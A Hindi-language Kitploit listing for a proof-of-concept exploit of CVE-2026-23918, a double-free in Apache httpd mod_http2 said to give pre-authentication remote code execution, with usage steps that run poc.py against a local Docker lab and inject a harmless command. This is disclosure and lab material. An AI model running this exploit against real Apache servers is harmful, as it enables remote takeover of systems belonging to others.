Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-23918 — Apache httpd mod_http2 स्ट्रीम क्लीनअप में डबल-फ्री जो प्री-ऑथ RCE की ओर ले जाता है। | Kitploit
उपकरण/GitHubGitHub/striga-ai/cve-2026-23918
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाबाइनरी शोषण
GitHubstriga-ai/cve-2026-23918

CVE-2026-23918

Apache httpd mod_http2 स्ट्रीम क्लीनअप में डबल-फ्री जो प्री-ऑथ RCE की ओर ले जाता है।

रिपॉजिटरी देखें
31644 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-23918

Apache httpd mod_http2 स्ट्रीम क्लीनअप में डबल-फ्री जो पूर्व-प्रमाणीकरण RCE की ओर ले जाता है।

प्रभावित: httpd 2.4.66 जिसमें mod_http2 और मल्टी-थ्रेडेड MPM (event/worker) है। ठीक किया गया: 2.4.67 में।

पाया और रिपोर्ट किया Bartlomiej Dmitruk (striga.ai) और Stanislaw Strzalkowski (isec.pl) ने।

विवरण: https://striga.ai/research/apache-httpd-mod-http2-double-free

आवश्यकताएँ

  • Docker
  • Python 3

उपयोग

कमजोर वातावरण बनाएँ और प्रारंभ करें:

root@kitploit:~
docker build -t httpd-poc .
docker run -d --name httpd-poc --privileged -p 9443:443 httpd-poc

system() और scoreboard पते प्राप्त करें:

root@kitploit:~
docker exec httpd-poc python3 /getaddr.py 1

एक्सप्लॉइट चलाएँ:

root@kitploit:~
python3 poc.py --host localhost --port 9443 \
    --cmd 'date >> /tmp/win' --workers 64 \
    --system <system_addr> --scoreboard <scoreboard_addr>

सत्यापित करें (निष्पादन संभाव्य है, इसमें मिनट से लेकर घंटे लग सकते हैं):

root@kitploit:~
docker exec httpd-poc cat /tmp/win

सफाई

root@kitploit:~
docker rm -f httpd-poc
टूल डाउनलोड करें